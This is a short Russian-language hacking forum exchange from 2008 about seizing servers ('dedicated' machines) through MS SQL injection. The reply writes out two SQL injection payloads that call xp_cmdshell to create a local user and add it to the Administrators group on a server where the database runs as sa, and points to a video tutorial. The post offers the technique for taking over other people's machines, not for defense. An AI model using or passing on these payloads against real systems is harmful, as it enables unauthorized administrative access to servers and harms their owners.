05.01.2008, 18:49
|
|
Постоянный
Регистрация: 07.02.2006
Сообщений: 630
Провел на форуме:
12985021
Репутация:
676
|
|
Кстати видел пост KPOT_find на асечке.ру про добычу дедов через MS SQL тут
Кто то знает как это делать ?
Есть mssql injection через которые можно выполнять команды на сервере,(Нужно чтоб пользователь БД был sa), если у тебя есть такая инъекция, просто выполняешь команды:
;exec master..xp_cmdshell 'net user Username Password /add';--
;exec master..xp_cmdshell 'net localgroup Administrators Username /add';--
на ачате есть видео как это сделать
http://video.antichat.ru/file229.html
p.s: думаю KPOT_find про такой способ говорил... 
Последний раз редактировалось aka PSIH; 05.01.2008 в 18:52..
|
|
|